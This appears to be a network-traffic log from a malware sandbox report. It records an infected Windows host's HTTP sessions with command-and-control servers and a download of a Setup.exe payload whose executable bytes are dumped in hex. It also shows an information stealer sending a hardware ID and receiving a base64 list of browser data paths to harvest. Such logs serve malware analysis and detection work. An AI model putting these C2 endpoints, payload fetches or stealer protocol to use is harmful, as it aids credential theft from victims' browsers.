Sep 3, 2024 17:13:30.979897022 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Sep 3, 2024 17:13:31.276659012 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.8	49745	185.215.113.16	80	3212	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:30.488903999 CEST	184	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 31 39 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000191001&unit=246122658369
Sep 3, 2024 17:13:31.305490971 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.8	49746	52.212.52.84	80	3212	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:31.372876883 CEST	69	OUT	GET /3858015/Setup.exe?hash=AgADYg HTTP/1.1 Host: ddl.safone.dev
Sep 3, 2024 17:13:32.002763987 CEST	841	IN	HTTP/1.1 200 OK Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1725376411&sid=c4c9725f-1ab0-44d8-820f-430df2718e11&s=%2BLAYXYYj9wdGhV7Mw7fcNlas4hEEZfwEDt16kNyc6sk%3D"}]} Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1725376411&sid=c4c9725f-1ab0-44d8-820f-430df2718e11&s=%2BLAYXYYj9wdGhV7Mw7fcNlas4hEEZfwEDt16kNyc6sk%3D Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]} Connection: keep-alive Content-Type: application/x-msdownload Range: bytes=0-6647094 Content-Range: bytes 0-6647094/6647095 Content-Disposition: attachment; filename="Setup.exe" Accept-Ranges: bytes Content-Length: 6647095 Date: Tue, 03 Sep 2024 15:13:31 GMT Server: Python/3.8 aiohttp/3.9.3 Via: 1.1 vegur
Sep 3, 2024 17:13:33.332336903 CEST	1236	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELf_%#GjZfG@Hf
Sep 3, 2024 17:13:33.332370043 CEST	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Sep 3, 2024 17:13:33.332392931 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c3 8d b4 26 00 00 Data Ascii: &&1f=@MZ6666u<@@PE@t``6tB$fGiG6dG6GF=tN1
Sep 3, 2024 17:13:33.332431078 CEST	1236	IN	Data Raw: 00 e8 22 c1 47 00 e9 6e fd ff ff 8b 45 90 e9 c1 fe ff ff 89 04 24 e8 ed c0 47 00 8d b4 26 00 00 00 00 8d b6 00 00 00 00 c7 05 ac 36 f3 00 01 00 00 00 e9 b1 fc ff ff 90 c7 05 ac 36 f3 00 00 00 00 00 e9 a1 fc ff ff 90 83 ec 1c 8b 44 24 20 89 04 24 Data Ascii: "GnE$G&66D$ $GUWVS$ats$b=a(`D$$D$)$tD$,`$$@^e[^_]
Sep 3, 2024 17:13:33.332442999 CEST	1236	IN	Data Raw: aa 00 00 8b 45 c4 8b 40 20 85 c0 0f 84 90 00 00 00 8d 45 c4 89 04 24 e8 bc b8 0d 00 e9 80 00 00 00 8d 85 4c ff ff ff 89 44 24 30 8d 85 50 ff ff ff 89 44 24 2c 8d 85 54 ff ff ff 89 44 24 28 8d 85 58 ff ff ff 89 44 24 24 8d 85 68 ff ff ff 89 44 24 Data Ascii: E@ E$LD$0PD$,TD$(XD$$hD$ ED$ED$ED$ED$ED$ED$ED$Et$PED$E$TEE@ uoLD$$PD$ TD$hD$ED$ED$ED$ED$E
Sep 3, 2024 17:13:33.332464933 CEST	1236	IN	Data Raw: 9c 00 00 00 dd 05 68 9a 88 00 dd 9c 24 94 00 00 00 89 94 24 90 00 00 00 d9 e8 dd 9c 24 88 00 00 00 89 8c 24 84 00 00 00 89 9c 24 80 00 00 00 c7 44 24 7c 04 00 00 00 89 74 24 78 dd 05 68 9a 88 00 dd 5c 24 70 89 7c 24 6c 8b 85 f0 fe ff ff 89 44 24 Data Ascii: h$$$$$D$\|t$xh\$p\|$lD$hp\$`x\$X\$P\$HD$DD$@D$<h\$4D$0D$,D$(\$ \$D$D$D$D$
Sep 3, 2024 17:13:33.332499981 CEST	1236	IN	Data Raw: dd 5c 24 08 8b 85 e0 fe ff ff 89 44 24 04 89 3c 24 e8 ba a0 12 00 83 45 e4 01 e9 83 fe ff ff 90 eb 01 90 c7 85 58 ff ff ff 00 00 00 00 e9 ec 01 00 00 8b 45 9c 89 85 f8 fe ff ff 8b 95 4c ff ff ff 8b 8d 68 ff ff ff 8b 9d 54 ff ff ff 8b b5 4c ff ff Data Ascii: \$D$<$EXELhTLLETTXTELPEE$$$4$$
Sep 3, 2024 17:13:33.332920074 CEST	1236	IN	Data Raw: ff ff ff dd 5c 24 0c dd 85 40 ff ff ff dd 5c 24 04 89 14 24 e8 5b 1a 04 00 8b 85 90 00 00 00 8b 40 20 85 c0 0f 85 80 f5 ff ff 8b 85 90 00 00 00 8b 50 14 8b 40 10 8b 8d 90 00 00 00 83 c0 0c 83 d2 00 89 41 10 89 51 14 8b 85 90 00 00 00 8b 10 8b 85 Data Ascii: \$@\$$[@ P@AQ@dE<.}u]M0$$$$E`$$@$D$\|EPD$xEdD$tE
Sep 3, 2024 17:13:33.332935095 CEST	1236	IN	Data Raw: 89 44 24 74 dd 85 20 ff ff ff dd 5c 24 6c dd 85 30 ff ff ff dd 5c 24 64 dd 85 40 ff ff ff dd 5c 24 5c 8b 85 a4 00 00 00 89 44 24 58 8b 45 70 89 44 24 54 89 4c 24 50 8b 45 7c 89 44 24 4c 8b 45 60 89 44 24 48 8b 45 1c 89 44 24 44 8b 85 b0 00 00 00 Data Ascii: D$t \$l0\$d@\$\D$XEpD$TL$PE\|D$LE`D$HED$DD$@(\$8E`D$4D$0D$,E<D$(D$$D$ 8\$D$E<D$\|$t$ELD$$X]T}@`
Sep 3, 2024 17:13:33.332958937 CEST	1236	IN	Data Raw: 18 ff ff ff dd 5c 24 18 8b 45 58 89 44 24 14 8b 45 7c 89 44 24 10 8b 85 e0 fe ff ff 89 44 24 0c 8b 85 dc fe ff ff 89 44 24 08 8b 85 d8 fe ff ff 89 44 24 04 89 14 24 e8 94 ae 06 00 8b 85 90 00 00 00 8b 40 20 85 c0 0f 84 45 07 00 00 e9 ba eb ff ff Data Ascii: \$EXD$E\|D$D$D$D$$@ EEHXP\|@xu11EER`PP\|@xMMAQMPT@PAQ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.8	49747	185.215.113.26	80	4208	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:31.794379950 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:13:32.360317945 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:13:32.361109972 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Sep 3, 2024 17:13:32.658781052 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.8	49748	185.215.113.26	80	4208	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:32.793647051 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:13:33.799664021 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:13:33.800744057 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Sep 3, 2024 17:13:34.066548109 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.8	49749	185.215.113.26	80	4208	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:34.582066059 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:13:35.498876095 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:13:35.499728918 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Sep 3, 2024 17:13:35.777713060 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.8	49750	185.215.113.26	80	4208	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:35.894762993 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:13:36.746856928 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:13:36.747865915 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Sep 3, 2024 17:13:37.016565084 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.8	49751	91.202.233.158	80	7068	C:\Users\user\AppData\Local\Temp\svchost015.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:36.501184940 CEST	89	OUT	GET / HTTP/1.1 Host: 91.202.233.158 Connection: Keep-Alive Cache-Control: no-cache
Sep 3, 2024 17:13:37.283771992 CEST	203	IN	HTTP/1.1 200 OK Date: Tue, 03 Sep 2024 15:13:37 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 3, 2024 17:13:37.307915926 CEST	414	OUT	POST /e96ea2db21fa9a1b.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGIIJDHCGCBKECBFIJKK Host: 91.202.233.158 Content-Length: 213 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 47 49 49 4a 44 48 43 47 43 42 4b 45 43 42 46 49 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 35 38 33 35 42 36 46 32 35 37 34 35 32 35 33 37 30 33 36 34 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 49 4a 44 48 43 47 43 42 4b 45 43 42 46 49 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 49 4a 44 48 43 47 43 42 4b 45 43 42 46 49 4a 4b 4b 2d 2d 0d 0a Data Ascii: ------EGIIJDHCGCBKECBFIJKKContent-Disposition: form-data; name="hwid"75835B6F2574525370364------EGIIJDHCGCBKECBFIJKKContent-Disposition: form-data; name="build"default------EGIIJDHCGCBKECBFIJKK--
Sep 3, 2024 17:13:37.619891882 CEST	407	IN	HTTP/1.1 200 OK Date: Tue, 03 Sep 2024 15:13:37 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 5a 6d 4e 6a 5a 57 55 31 4d 57 49 33 4d 6d 4d 30 4e 44 4d 7a 4e 54 64 68 4e 44 5a 6c 4d 47 59 78 59 32 59 33 4e 6a 55 32 4e 54 41 78 4d 7a 67 35 5a 54 67 35 5a 6d 59 79 5a 54 56 6d 59 57 4d 33 4f 47 49 31 4e 44 64 6a 4e 44 67 7a 4d 57 49 32 5a 6a 59 34 4e 32 51 32 5a 47 51 31 59 7a 4a 68 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 46 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: ZmNjZWU1MWI3MmM0NDMzNTdhNDZlMGYxY2Y3NjU2NTAxMzg5ZTg5ZmYyZTVmYWM3OGI1NDdjNDgzMWI2ZjY4N2Q2ZGQ1YzJhfHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDF8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
Sep 3, 2024 17:13:37.666029930 CEST	469	OUT	POST /e96ea2db21fa9a1b.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFHIEBKKFHIEGCAKECGH Host: 91.202.233.158 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 46 48 49 45 42 4b 4b 46 48 49 45 47 43 41 4b 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 63 63 65 65 35 31 62 37 32 63 34 34 33 33 35 37 61 34 36 65 30 66 31 63 66 37 36 35 36 35 30 31 33 38 39 65 38 39 66 66 32 65 35 66 61 63 37 38 62 35 34 37 63 34 38 33 31 62 36 66 36 38 37 64 36 64 64 35 63 32 61 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 49 45 42 4b 4b 46 48 49 45 47 43 41 4b 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 49 45 42 4b 4b 46 48 49 45 47 43 41 4b 45 43 47 48 2d 2d 0d 0a Data Ascii: ------AFHIEBKKFHIEGCAKECGHContent-Disposition: form-data; name="token"fccee51b72c443357a46e0f1cf7656501389e89ff2e5fac78b547c4831b6f687d6dd5c2a------AFHIEBKKFHIEGCAKECGHContent-Disposition: form-data; name="message"browsers------AFHIEBKKFHIEGCAKECGH--
Sep 3, 2024 17:13:37.900763035 CEST	1236	IN	HTTP/1.1 200 OK Date: Tue, 03 Sep 2024 15:13:37 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 1520 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3Nl
Sep 3, 2024 17:13:37.900897026 CEST	512	IN	Data Raw: 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 Data Ascii: clxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRml
